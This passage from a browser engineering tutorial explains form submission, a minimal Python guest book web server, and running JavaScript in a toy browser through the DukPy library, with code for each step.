element allows you to embed one web page into another as a little
window. the focus tree can be arbitrarily deep.
So now we have user input working with input
elements.
Before we move on, there is one last tweak that we need to make: drawing
the text cursor in the Tab
’s render
method.
This turns out to be harder than expected: the cursor should be drawn by
the InputLayout
of the focused node, and that means that
each node has to know whether or not it’s focused:
class Element:
    def __init__(self, tag, attributes, parent):
        # ...
        self.is_focused = False
Add the same field to Text
nodes; they’ll never be
focused and never draw cursors, but it’s more convenient if
Text
and Element
have the same fields. We’ll
set this when we move focus to an input element:
class Tab:
    def click(self, x, y):
        while elt:
            # ...
            elif elt.tag == "input":
                elt.attributes["value"] = ""
                if self.focus:
                    self.focus.is_focused = False
                self.focus = elt
                elt.is_focused = True
                return self.render()
Note that we have to un-focusUn-focusing is called “blurring”, which can get a bit
confusing. the currently-focused element, lest it keep
drawing its cursor. Anyway, now we can draw a cursor if an
input
element is focused:
class InputLayout:
    def paint(self, display_list):
        # ...
        if self.node.is_focused:
            cx = self.x + self.font.measure(text)
            display_list.append(DrawLine(
                cx, self.y, cx, self.y + self.height, "black", 1))
Now you can click on a text entry, type into it, and modify its value. The next step is submitting the now-filled-out form.
The code that draws the text cursor here is kind of clunky—you could imagine each layout object knowing if it’s focused and then being responsible for drawing the cursor. That’s the more traditional approach in GUI frameworks, but Chrome for example keeps track of a global focused element to make sure the cursor can be globally styled.
You submit a form by clicking on a button
. So let’s add
another condition to the big while
loop in
click
:
class Tab:
    def click(self, x, y):
        while elt:
            # ...
            elif elt.tag == "button":
                # ...
            # ...
Once we’ve found the button, we need to find the form that it’s in, by walking up the HTML tree:
elif elt.tag == "button":
    while elt:
        if elt.tag == "form" and "action" in elt.attributes:
            return self.submit_form(elt)
        elt = elt.parent
The submit_form
method is then in charge of finding all
of the input elements, encoding them in the right way, and sending the
POST
request. First, we look through all the descendants of
the form
to find input
elements:
class Tab:
    def submit_form(self, elt):
        inputs = [node for node in tree_to_list(elt, [])
                  if isinstance(node, Element)
                  and node.tag == "input"
                  and "name" in node.attributes]
For each of those input
elements, we need to extract the
name
attribute and the value
attribute, and
form-encode both of them. Form encoding is how the name/value
pairs are formatted in the HTTP POST
request. Basically:
name, then equal sign, then value; and name-value pairs are separated by
ampersands:
class Tab:
    def submit_form(self, elt):
        # ...
        body = ""
        for input in inputs:
            name = input.attributes["name"]
            value = input.attributes.get("value", "")
            body += "&" + name + "=" + value
        body = body[1:]
Now, any time you see something like this, you’ve got to ask: what if
the name or the value has an equal sign or an ampersand in it? So in
fact, “percent encoding” replaces all special characters with a percent
sign followed by those characters’ hex codes. For example, a space
becomes %20
and a period becomes %2e
. Python
provides a percent-encoding function as quote
in the
urllib.parse
module:You can write your own percent_encode
function
using Python’s ord
and hex
functions if you’d
like. I’m using the standard function for expediency. Earlier in the book, using these library functions
would have obscured key concepts, but by this point percent encoding is
necessary but not conceptually interesting.
        for input in inputs:
            # ...
            name = urllib.parse.quote(name)
            value = urllib.parse.quote(value)
            # ...
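If you'd rather write percent_encode yourself, as the footnote suggests, here's a minimal sketch; the safe-character set is a simplification of the full RFC 3986 rule, and it handles only single-byte (ASCII) characters:

```python
# Simplified percent_encode: keep unreserved characters, escape the
# rest as "%" plus the character's two-digit hex code. ASCII only.
def percent_encode(s):
    out = ""
    for c in s:
        if c.isalnum() or c in "-_.~":
            out += c
        else:
            out += "%" + "{:02X}".format(ord(c))
    return out
```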
Now that submit_form
has built a request body, it needs
to make a POST
request. I’m going to defer that
responsibility to the load
function, which handles making
requests:
    def submit_form(self, elt):
        # ...
        url = self.url.resolve(elt.attributes["action"])
        self.load(url, body)
The new body
argument to load
is then
passed through to request
:
    def load(self, url, body=None):
        # ...
        headers, body = url.request(body)
        # ...
In request
, this new argument is used to decide between
a GET
and a POST
request:
class URL:
    def request(self, payload=None):
        # ...
        method = "POST" if payload else "GET"
        # ...
        body = "{} {} HTTP/1.0\r\n".format(method, self.path)
        # ...
If there it’s a POST
request, the
Content-Length
header is mandatory:
class URL:
    def request(self, payload=None):
        # ...
        if payload:
            length = len(payload.encode("utf8"))
            body += "Content-Length: {}\r\n".format(length)
        # ...
Note that the Content-Length
is the length of the
payload in bytes, which might not be equal to its length in
letters.Because
characters from many languages are encoded as multiple
bytes. Finally, after the headers, we send the payload
itself:
class URL:
    def request(self, payload=None):
        # ...
        body += "\r\n" + (payload if payload else "")
        s.send(body.encode("utf8"))
        # ...
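The byte-versus-letter distinction mentioned above is easy to check directly:

```python
# One accented character is one "letter" but two bytes in UTF-8.
payload = "café"
char_len = len(payload)                  # number of characters
byte_len = len(payload.encode("utf8"))  # number of bytes
```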
So that’s how the POST
request gets sent. Then the
server responds with an HTML page and the browser will render it in the
totally normal way. That’s basically it for forms!
While most form submissions use the form encoding described here,
forms with file uploads (using <input type=file>
) use
a different
encoding that includes metadata for each key-value pair (like the
file name or file type). There’s also an obscure text/plain
encoding option, which uses no escaping and which even the standard
warns against using.
So… How do web applications (a.k.a. web apps) use forms? When you use an application from your browser—whether you are registering to vote, looking at pictures of your baby cousin, or checking your email—there are typicallyHere I’m talking in general terms. There are some browser applications without a server, and others where the client code is exceptionally simple and almost all the code is on the server. two programs involved: client code that runs in the browser, and server code that runs on the server. When you click on things or take actions in the application, that runs client code, which then sends data to the server via HTTP requests.
For example, imagine a simple message board application. The server stores the state of the message board—who has posted what—and has logic for updating that state. But all the actual interaction with the page—drawing the posts, letting the user enter new ones—happens in the browser. Both components are necessary.
The browser and the server interact over HTTP. The browser first makes a GET request to the server to load the current message board. The user interacts with the browser to type a new post, and submits it to the server (say, via a form). That causes the browser to make a POST request to the server, which instructs the server to update the message board state. The server then needs the browser to update what the user sees; with forms, the server sends a new HTML page in its response to the POST request.
Forms are a simple, minimal introduction to this cycle of request and response and make a good introduction to how browser applications work. They’re also implemented in every browser and have been around for decades. These days many web applications use the form elements, but replace synchronous POST requests with asynchronous ones driven by Javascript,In the early 2000s, the adoption of asynchronous HTTP requests sparked the wave of innovative new web applications called Web 2.0. which makes applications snappier by hiding the time to make the HTTP request. In return for that snappiness, that JavaScript code must now handle errors, validate inputs, and indicate loading time. In any case, both synchronous and asynchronous uses of forms are based on the same principles of client and server code.
There are request types besides GET and POST, like PUT (create if nonexistent) and DELETE, or the more obscure CONNECT and TRACE. In 2010 the PATCH method was standardized in RFC 5789. New methods were intended as a standard extension mechanism for HTTP, and some protocols were built this way (like WebDav’s PROPFIND, MOVE, and LOCK methods), but this did not become an enduring way to extend the web, and HTTP 2.0 and 3.0 did not add any new methods.
To better understand the request/response cycle, let’s write a simple web server. It’ll implement an online guest book,They were very hip in the 90s—comment threads from before there was anything to comment on. kind of like an open, anonymous comment thread. Now, this is a book on web browser engineering, so I won’t discuss web server implementation that thoroughly. But I want you to see how the server side of an application works.
A web server is a separate program from the web browser, so let’s start a new file. The server will need to:
Let’s start by opening a socket. Like for the browser, we need to create an internet streaming socket using TCP:
import socket
s = socket.socket(
    family=socket.AF_INET,
    type=socket.SOCK_STREAM,
    proto=socket.IPPROTO_TCP,
)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
The setsockopt
call is optional. Normally, when a
program has a socket open and it crashes, your OS prevents that port
from being reusedWhen
your process crashes, the computer on the end of the connection won’t be
informed immediately; if some other process opens the same port, it
could receive data meant for the old, now-dead process.
for a short period. That’s annoying when developing a server; calling
setsockopt
with the SO_REUSEADDR
option allows
the OS to immediately reuse the port.
Now, with this socket, instead of calling connect
(to
connect to some other server), we’ll call bind
, which waits
for other computers to connect:
s.bind(('', 8000))
s.listen()
Let’s look at the bind call first. Its first argument says who should be allowed to make connections to the server; the empty string means that anyone can connect. The second argument is the port others must use to talk to our server; I’ve chosen 8000. I can’t use 80, because ports below 1024 require administrator privileges, but you can pick something other than 8000 if, for whatever reason, port 8000 is taken on your machine.
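Incidentally, if you ever want the OS to pick a free port for you, you can bind to port 0 and then ask which port was assigned. This is a standard socket trick, sketched here for illustration; the guest book server itself just uses 8000:

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))            # port 0 means "any free port"
port = s.getsockname()[1]  # ask the OS which port it picked
print(port)
s.close()
```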
Finally, after the bind call, the listen call tells the OS that we’re ready to accept connections.
To actually accept those connections, we enter a loop that runs once per connection. At the top of the loop we call s.accept to wait for a new connection:
while True:
    conx, addr = s.accept()
    handle_connection(conx)
That connection object is, confusingly, also a socket: it is the socket corresponding to that one connection. We know what to do with those: we read the contents and parse the HTTP message. But it’s a little trickier in the server than in the browser, because the server can’t just read from the socket until the connection closes—the browser is waiting for the server and won’t close the connection.
So we’ve got to read from the socket line-by-line. First, we read the request line:
def handle_connection(conx):
    req = conx.makefile("b")
    reqline = req.readline().decode('utf8')
    method, url, version = reqline.split(" ", 2)
    assert method in ["GET", "POST"]
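To see the makefile-plus-readline pattern in action outside the server, here’s a small standalone sketch; it uses socket.socketpair from the standard library to stand in for a real browser connection (the request text is made up for the demo):

```python
import socket

# A connected pair of sockets: pretend `browser` is the browser's end
server, browser = socket.socketpair()
browser.send(b"GET / HTTP/1.0\r\nHost: example\r\n\r\n")

# makefile lets us read the socket like a file, one line at a time,
# without waiting for the connection to close
req = server.makefile("b")
print(req.readline())  # b'GET / HTTP/1.0\r\n'
```

Each readline call returns as soon as a full line has arrived, which is exactly what we need when the browser keeps the connection open.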
Then we read the headers until we get to a blank line, accumulating the headers in a dictionary:
def handle_connection(conx):
    # ...
    headers = {}
    while True:
        line = req.readline().decode('utf8')
        if line == '\r\n': break
        header, value = line.split(":", 1)
        headers[header.lower()] = value.strip()
Finally we read the body, but only when the Content-Length header tells us how much of it to read (that’s why that header is mandatory on POST requests):
def handle_connection(conx):
    # ...
    if 'content-length' in headers:
        length = int(headers['content-length'])
        body = req.read(length).decode('utf8')
    else:
        body = None
Now the server needs to generate a web page in response. We’ll get to that later; for now, just abstract that away behind a do_request call:
def handle_connection(conx):
    # ...
    status, body = do_request(method, url, headers, body)
The server then sends this page back to the browser:
def handle_connection(conx):
    # ...
    response = "HTTP/1.0 {}\r\n".format(status)
    response += "Content-Length: {}\r\n".format(
        len(body.encode("utf8")))
    response += "\r\n" + body
    conx.send(response.encode('utf8'))
    conx.close()
This is all pretty bare-bones: our server doesn’t check that the browser is using HTTP 1.0 to talk to it, it doesn’t send back any headers at all except Content-Length, it doesn’t support TLS, and so on. Again: this is a web browser book—it’ll do.
Ilya Grigorik’s High Performance Browser Networking is an excellent deep dive into networking and how to optimize for it in a web application. There are things the client can do (make fewer requests, avoid polling, reuse connections) and things the server can do (compression, protocol support, sharing domains).
So far all of this server code is “boilerplate”—any web application will have similar code. What makes our server a guest book, on the other hand, depends on what happens inside do_request. It needs to store the guest book state, generate HTML pages, and respond to POST requests.
Let’s store guest book entries in a Python list. Usually web applications use persistent state, like a database, so that the server can be restarted without losing state, but our guest book need not be that resilient.
ENTRIES = [ 'Pavel was here' ]
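If you did want the guest book to survive restarts (see the persistence exercise at the end of the chapter), a minimal sketch might back the list with a JSON file. The file name and helper names here are made up for illustration:

```python
import json
import os

SAVE_FILE = "guestbook.json"  # hypothetical file name

def load_entries():
    # Restore saved entries, falling back to the default list
    if os.path.exists(SAVE_FILE):
        with open(SAVE_FILE) as f:
            return json.load(f)
    return ['Pavel was here']

def save_entries(entries):
    # Rewrite the whole file on every change; fine at this scale
    with open(SAVE_FILE, "w") as f:
        json.dump(entries, f)

ENTRIES = load_entries()
```

With this approach add_entry would call save_entries(ENTRIES) after appending. A real application would use a database instead.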
Next, do_request has to output HTML that shows those entries:
def do_request(method, url, headers, body):
    out = "<!doctype html>"
    for entry in ENTRIES:
        out += "<p>" + entry + "</p>"
    return "200 OK", out
This is definitely “minimal” HTML, so it’s a good thing our browser will insert implicit tags and has some default styles! You can test it out by running this minimal web server and, while it’s running, directing your browser to http://localhost:8000/, where localhost is what your computer calls itself and 8000 is the port we chose earlier. You should see one guest book entry.
It’s probably better to use a real web browser, instead of this book’s toy browser, to debug this web server. That way you don’t have to worry about browser bugs while you work on server bugs. But this server does support both real and toy browsers.
We’ll use forms to let visitors write in the guest book:
def do_request(method, url, headers, body):
    # ...
    out += "<form action=add method=post>"
    out += "<p><input name=guest></p>"
    out += "<p><button>Sign the book!</button></p>"
    out += "</form>"
    # ...
When this form is submitted, the browser will send a POST request to http://localhost:8000/add. So the server needs to react to these submissions. That means do_request will field two kinds of requests: regular browsing and form submissions. Let’s separate the two kinds of requests into different functions.
First, rename the current do_request to show_comments:
def show_comments():
    # ...
    return out
This then frees up the do_request function to figure out which function to call for which request:
def do_request(method, url, headers, body):
    if method == "GET" and url == "/":
        return "200 OK", show_comments()
    elif method == "POST" and url == "/add":
        params = form_decode(body)
        return "200 OK", add_entry(params)
    else:
        return "404 Not Found", not_found(url, method)
When a POST request to /add comes in, the first step is to decode the request body:
def form_decode(body):
    params = {}
    for field in body.split("&"):
        name, value = field.split("=", 1)
        name = urllib.parse.unquote_plus(name)
        value = urllib.parse.unquote_plus(value)
        params[name] = value
    return params
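To check the decoding logic, here is the same decoder run standalone on a sample body (the function is repeated so this snippet is self-contained, and the sample input is made up):

```python
import urllib.parse

def form_decode(body):
    # Split the body into name=value pairs and percent-decode each side
    params = {}
    for field in body.split("&"):
        name, value = field.split("=", 1)
        params[urllib.parse.unquote_plus(name)] = \
            urllib.parse.unquote_plus(value)
    return params

print(form_decode("guest=Hello+world%21"))
# {'guest': 'Hello world!'}
```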
Note that I use unquote_plus instead of unquote, because browsers may also use a plus sign to encode a space. The add_entry function then looks up the guest parameter and adds its content as a new guest book entry:
def add_entry(params):
    if 'guest' in params:
        ENTRIES.append(params['guest'])
    return show_comments()
I’ve also added a “404” response. Fitting the austere stylings of our guest book, here’s the 404 page:
def not_found(url, method):
    out = "<!doctype html>"
    out += "<h1>{} {} not found!</h1>".format(method, url)
    return out
Try it! You should be able to restart the server, open it in your browser, and update the guest book a few times. You should also be able to use the guest book from a real web browser.
Typically connection handling and request routing are handled by a web framework; this book, for example, uses bottle.py. Frameworks parse requests into convenient data structures, route requests to the right handler, and can also provide tools like HTML templates, session handling, database access, input validation, and API generation.
With this chapter we’re starting to transform our browser into an application platform. We’ve added:
Plus, our browser now has a little web server friend. That’s going to be handy as we add more interactive features to the browser.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
class URL:
def __init__(url)
def request(payload)
def resolve(url)
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
INPUT_WIDTH_PX
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
if __name__ == "__main__"
There’s also a server now, but it’s much simpler:
def handle_connection(conx)
def do_request(method, url, headers, body)
def form_decode(body)
ENTRIES
def show_comments()
def not_found(url, method)
def add_entry(params)
if __name__ == "__main__"
If you run it, it should look something like this:
Enter key: In most browsers, if you hit the “Enter” or “Return” key while inside a text entry, that submits the form that the text entry was in. Add this feature to your browser.
GET forms: Forms can be submitted via GET requests as well as POST requests. In GET requests, the form-encoded data is pasted onto the end of the URL, separated from the path by a question mark, like /search?q=hi; GET form submissions have no body. Implement GET form submissions.
Blurring: Right now, if you click inside a text entry, and then inside the address bar, two cursors will appear on the screen. To fix this, add a blur method to each Tab which unfocuses anything that is focused, and call it before changing focus.
Tab: In most browsers, the <Tab> key (on your keyboard) moves focus from one input field to the next. Implement this behavior in your browser. The “tab order” of input elements should be the same as the order of <input> elements on the page.The tabindex property lets a web page change this tab order, but its behavior is pretty weird.
Check boxes: In HTML, input elements have a type attribute. When set to checkbox, the input element looks like a checkbox; it’s checked if the checked attribute is set, and unchecked otherwise.Technically, the checked attribute only affects the state of the checkbox when the page loads; checking and unchecking a checkbox does not affect this attribute but instead manipulates internal state. When the form is submitted, a checkbox’s name=value pair is included only if the checkbox is checked. (If the checkbox has no value attribute, the default is the string on.)
Resubmit requests: One reason to separate GET and POST requests is that GET requests are supposed to be idempotent (read-only, basically) while POST requests are assumed to change the web server state. That means that going “back” to a GET request (making the request again) is safe, while going “back” to a POST request is a bad idea. Change the browser history to record what method was used to access each URL, and the POST body if one was used. When you go back to a POST-ed URL, ask the user if they want to resubmit the form. Don’t go back if they say no; if they say yes, submit a POST request with the same body as before.
Message board: Right now our web server is a simple guest book. Extend it into a simple message board by adding support for topics. Each topic should have its own URL and its own list of messages. So, for example, /cooking should be a page of posts (about cooking) and comments submitted through the form on that page should only show up when you go to /cooking, not when you go to /cars. Make the home page, from /, list the available topics with a link to each topic’s page. Make it possible for users to add new topics.
Persistence: Back the server’s list of guest book entries with a file, so that when the server is restarted it doesn’t lose data.
Rich buttons: Make it possible for a button to contain arbitrary elements as children, and render them correctly. The children should be contained inside button instead of spilling out—this can make a button really tall. Think about edge cases, like a button that contains another button, an input area, or a link, and test real browsers to see what they do.
The first web applications were like last chapter’s guest book, with the server generating new web pages for every user action. But in the early 2000s, JavaScript-enhanced web applications, which can update pages dynamically and respond immediately to user actions, took their place. Let’s add support for this key web application technology to our toy browser.
Actually writing a JavaScript interpreter is beyond the scope of this book,But check out a book on programming language implementation if it sounds interesting! so this chapter uses the dukpy library for executing JavaScript.
DukPy wraps a JavaScript interpreter called Duktape. The most famous JavaScript interpreters are those used in browsers: TraceMonkey (Firefox), JavaScriptCore (Safari), and V8 (Chrome). Unlike those implementations, which are extremely fast but also extremely complex, Duktape aims to be simple and extensible, and is usually embedded inside a larger C or C++ project.For example, in a video game the high-speed graphics code is usually written in C or C++ , but the actual plot of the game is usually written in a simpler language.
Like other JavaScript engines, DukPy not only executes JavaScript code, but also allows JavaScript code to call exported Python functions. We’ll be using this feature to allow JavaScript code to modify the web page it’s running on.
The first step to using DukPy is installing it. On most machines, including on Windows, macOS, and Linux systems, you should be able to do this with:
pip3 install dukpy
Depending on your computer, the pip3 command might be called pip, or you might use easy_install instead. You may also need to install pip3. If you do your Python programming through an IDE, you may need to use your IDE’s package installer. If nothing else works, you can build from source. If you’re following along in something other than Python, you might need to skip this chapter, though you could try binding directly to the duktape library that dukpy uses.
To test whether you installed DukPy correctly, execute this:
import dukpy
"2 + 2") dukpy.evaljs(
If you get an error on the first line, you probably failed to install DukPy.Or, on my Linux machine, I sometimes get errors due to file ownership. You may have to do some sleuthing. If you get an error, or a segfault, on the second line, there’s a chance that Duktape failed to compile, and maybe doesn’t support your system. In that case you might need to skip this chapter.
Note to JavaScript experts: DukPy does not implement newer syntax like let and const or arrow functions. You’ll need to use old-school JavaScript from the turn of the century.
The test above shows how you run JavaScript code in DukPy: you just call evaljs! Let’s put this newfound knowledge to work in our browser.
On the web, JavaScript is found in <script> tags. Normally, a <script> tag has a src attribute with a relative URL that points to a JavaScript file, much like with CSS files. A <script> tag could also contain JavaScript source code between the start and end tag, but we won’t implement that.It’s a challenge for parsing, since it’s hard to avoid less than and greater than signs in JavaScript code.
Finding and downloading those scripts is similar to what we did for CSS. First, we need to find all of the scripts:
class Tab:
    def load(self, url, body=None):
        # ...
        scripts = [node.attributes["src"] for node
                   in tree_to_list(self.nodes, [])
                   if isinstance(node, Element)
                   and node.tag == "script"
                   and "src" in node.attributes]
        # ...
Next we run all of the scripts:
def load(self, url, body=None):
    # ...
    for script in scripts:
        header, body = url.resolve(script).request()
        print("Script returned: ", dukpy.evaljs(body))
    # ...
This should run before styling and layout. To try it out, create a simple web page with a script tag:
<script src=test.js></script>
Then write a super simple script to test.js, maybe this:
var x = 2
x + x
Point your browser at that page, and you should see:
Script returned: 4
That’s your browser running its first bit of JavaScript!
Actually, real browsers run JavaScript code as soon as the browser parses the <script> tag, not after the whole page is parsed. Or, at least, that is the default; there are many options. What our toy browser does is what a real browser does when the defer attribute is set. The default behavior is much trickier to implement efficiently.
Right now our browser just prints the last expression in a script; but in a real browser scripts must call the console.log function to print. To support that, we will need to export a function from Python into JavaScript. We’ll be exporting a lot of functions, so to avoid polluting the Tab object with many new methods, let’s put this code in a new JSContext class:
class JSContext:
    def __init__(self):
        self.interp = dukpy.JSInterpreter()

    def run(self, code):
        return self.interp.evaljs(code)
DukPy’s JSInterpreter object stores the values of all the JavaScript variables and lets us run multiple JavaScript snippets and share variable values and other state between them.
We create this new JSContext object while loading the page:
class Tab:
    def load(self, url, body=None):
        # ...
        self.js = JSContext()
        for script in scripts:
            # ...
            self.js.run(body)
As a side benefit of using one JSContext for all scripts, it is now possible to run two scripts and have one of them define a variable that the other uses, say on a page like this:
<script src=a.js></script>
<script src=b.js></script>
Suppose a.js is “var x = 2;” and b.js is “console.log(x + x)”; the variable x is set in a.js but used in b.js. In real web browsers, that’s important, since one script might define library functions that another script wants to call.
To provide JavaScript access to the outside world—such as to the console output—we must export functions. The JavaScript function console.log corresponds to the Python print function. We leverage this correspondence using DukPy’s export_function:If you’re using Python 2, you’ll need to write a little wrapper function around print instead.
class JSContext:
    def __init__(self):
        # ...
        self.interp.export_function("log", print)
We can call an exported function from JavaScript using DukPy’s call_python function. For example:
call_python("log", "Hi from JS")
When this JavaScript code runs, DukPy converts the JavaScript string "Hi from JS" into a Python string,This conversion also works on numbers, strings, and booleans, but not with fancy objects. and then passes that Python string to the print function we exported. Then print prints that string.
Since we ultimately want JavaScript to call a console.log function, not a call_python function, we need to define a console object and then give it a log property. We can do that in JavaScript:
console = { log: function(x) { call_python("log", x); } }
In case you’re not too familiar with JavaScript,Now’s a good time to brush up—this chapter has a ton of JavaScript! this defines a variable called console, whose value is an object literal with the property log, whose value is a function that calls call_python.
We can call that JavaScript code our “JavaScript runtime”; let’s stick it in a runtime.js file and execute it when the JSContext is created, before we run any user code:
class JSContext:
    def __init__(self):
        # ...
        with open("runtime.js") as f:
            self.interp.evaljs(f.read())
Now you should be able to put console.log("Hi from JS!") into a JavaScript file, run it from your browser, and see output in your terminal. You should also be able to call console.log multiple times.
Taking a step back, when we run JavaScript in our browser, we’re mixing: C code, which implements the JavaScript interpreter; Python code, which implements certain JavaScript functions; a JavaScript runtime, which wraps the Python API to look more like the JavaScript one; and of course some user code in JavaScript. There’s a lot of complexity here!
If a script runs for a long time, or has an infinite loop, our browser locks up and become completely unresponsive to the user. This is a consequence of JavaScript’s single-threaded semantics and its task-based, run-to-completion scheduling. Some APIs like Web Workers, allow limited multithreading, but those threads largely don’t have access to the DOM. Chapter 13 has more to say about how browsers deal with slow user scripts.
Crashes in JavaScript code are frustrating to debug. You can cause a crash by writing bad code, or by explicitly raising an exception, like so:
throw Error("bad");
When a web page runs some JavaScript that crashes, the browser should ignore the crash. Web pages shouldn’t be able to crash our browser! You can implement that like this:
class Tab:
    def load(self, url, body=None):
        for script in scripts:
            # ...
            try:
                self.js.run(body)
            except dukpy.JSRuntimeError as e:
                print("Script", script, "crashed", e)
But as you go through this chapter, you’ll also run into another type of crash: crashes in the JavaScript runtime. We can’t ignore those, because we want our runtime to work. Debugging these crashes is a bear: by default DukPy won’t show a backtrace, and if the runtime code calls into an exported function that crashes, it gets even more confusing.
Here are a few tips to help with these crashes. First, if you get a crash inside some JavaScript function, wrap the body of the function like this:
function foo() {
    try {
        // ...
    } catch(e) {
        console.log("Crash in function foo()", e.stack);
        throw e;
    }
}
This code catches all exceptions and prints a stack trace before re-raising them. If you instead are getting crashes inside an exported function you will need to wrap that function, on the Python side:
class JSContext:
    def foo(self, arg):
        try:
            # ...
        except:
            import traceback
            traceback.print_exc()
            raise
Debugging these issues is not easy, because all these calls between Python and JavaScript get pretty complicated. Because these bugs are hard, it’s worth approaching debugging systematically and gathering a lot of information before attempting a fix.
So far, JavaScript evaluation is fun but useless, because JavaScript can’t make any kinds of modifications to the page itself. (Why even run JavaScript if it can’t do anything besides print? Who looks at a browser’s console output?) We need to allow JavaScript to modify the page.
JavaScript manipulates a web page by calling any of a large set of methods collectively called the DOM API, for “Document Object Model”. The DOM API is big, and it keeps getting bigger, so we won’t be implementing all, or even most, of it. But a few core functions show key elements of the full API:
querySelectorAll returns all the elements matching a selector;
getAttribute returns an element’s value for some attribute; and
innerHTML replaces the contents of an element with new HTML.
We’ll implement simplified versions of these APIs.The simplifications will be minor. querySelectorAll will return an array, not this thing called a NodeList; innerHTML will only write the HTML contents of an element, and won’t allow reading those contents. This suffices to demonstrate JavaScript-browser interaction.
Let’s start with querySelectorAll. First, export a function:
class JSContext:
    def __init__(self):
        # ...
        self.interp.export_function("querySelectorAll",
            self.querySelectorAll)
        # ...
In JavaScript, querySelectorAll is a method on the document object, which we need to define in the JavaScript runtime:
document = { querySelectorAll: function(s) {
return call_python("querySelectorAll", s);
}}
On the Python side, querySelectorAll first has to parse the selector and then find and return the matching elements. To parse the selector, I’ll call into the CSSParser’s selector method:If you pass querySelectorAll an invalid selector, the selector call will throw an error, and DukPy will convert that Python-side exception into a JavaScript-side exception in the web script we are running, which can catch it and do something else.
class JSContext:
    def querySelectorAll(self, selector_text):
        selector = CSSParser(selector_text).selector()
Next we need to find and return all matching elements. To do that, we need the JSContext to have access to the Tab, specifically to its nodes field. So let’s pass in the Tab when creating a JSContext:
class JSContext:
    def __init__(self, tab):
        self.tab = tab
        # ...

class Tab:
    def load(self, url, body=None):
        # ...
        self.js = JSContext(self)
        # ...
# ...
Now querySelectorAll will find all nodes matching the selector:
def querySelectorAll(self, selector_text):
    # ...
    nodes = [node for node
             in tree_to_list(self.tab.nodes, [])
             if selector.matches(node)]
Finally we need to return those nodes back to JavaScript. You might try something like this:
def querySelectorAll(self, selector_text):
    # ...
    return nodes
However, this throws an error:Yes, that’s a confusing error message. Is it a JSRuntimeError, an EvalError, or a TypeError? The confusion is a consequence of the complex interaction of Python, JS, and C code.
_dukpy.JSRuntimeError: EvalError:
Error while calling Python Function:
TypeError('Object of type Element is not JSON serializable')
What DukPy is trying to tell you is that it has no idea what to do with the Element objects that querySelectorAll returns. After all, the Element class only exists in Python, not JavaScript!
Python objects need to stay on the Python side of the browser, so JavaScript code will need to refer to them via some kind of indirection. I’ll use simple numeric identifier, which I’ll call a handle.Note the similarity to file descriptors, which give user-level applications access to kernel data structures.
We’ll need to keep track of the handle-to-node mapping. Let’s create a node_to_handle data structure to map nodes to handles, and a handle_to_node map that goes the other way:
class JSContext:
    def __init__(self, tab):
        # ...
        self.node_to_handle = {}
        self.handle_to_node = {}
        # ...
Now the querySelectorAll handler can allocate handles for each node and return those handles instead:
def querySelectorAll(self, selector_text):
    # ...
    return [self.get_handle(node) for node in nodes]
The get_handle function should create a new handle if one doesn’t exist yet:
class JSContext:
    def get_handle(self, elt):
        if elt not in self.node_to_handle:
            handle = len(self.node_to_handle)
            self.node_to_handle[elt] = handle
            self.handle_to_node[handle] = elt
        else:
            handle = self.node_to_handle[elt]
        return handle
So now the querySelectorAll handler returns something like [1, 3, 4, 7], with each number being a handle for an element, which DukPy can easily convert into JavaScript objects. Now of course, on the JavaScript side, querySelectorAll shouldn’t return a bunch of numbers: it should return a list of Node objects.In a real browser, querySelectorAll actually returns a NodeList object, for kind-of abstruse reasons that aren’t relevant here. So let’s define a Node object in our runtime that wraps a handle:If your JavaScript is rusty, you might want to read up on the crazy way you define classes in JavaScript. Modern JavaScript also provides the class syntax, which is more sensible, but it’s not supported in DukPy.
function Node(handle) { this.handle = handle; }
We create these Node objects in querySelectorAll’s wrapper:This code creates new Node objects every time you call querySelectorAll, even if there’s already a Node for that handle. That means you can’t use equality to compare Node objects. I’ll ignore that, but a real browser wouldn’t.
document = { querySelectorAll: function(s) {
var handles = call_python("querySelectorAll", s);
return handles.map(function(h) { return new Node(h) });
}}
Now that we’ve got some Nodes, what can we do with them?
One simple DOM method is getAttribute, a method on Node objects that lets you get the value of HTML attributes. Implementing getAttribute means solving the opposite problem to querySelectorAll: taking Node objects on the JavaScript side, and shipping them over to Python.
The solution is similar to querySelectorAll: instead of shipping the Node object itself, we send over its handle:
Node.prototype.getAttribute = function(attr) {
return call_python("getAttribute", this.handle, attr);
}
On the Python side, the getAttribute function takes two arguments, a handle and an attribute:
class JSContext:
    def getAttribute(self, handle, attr):
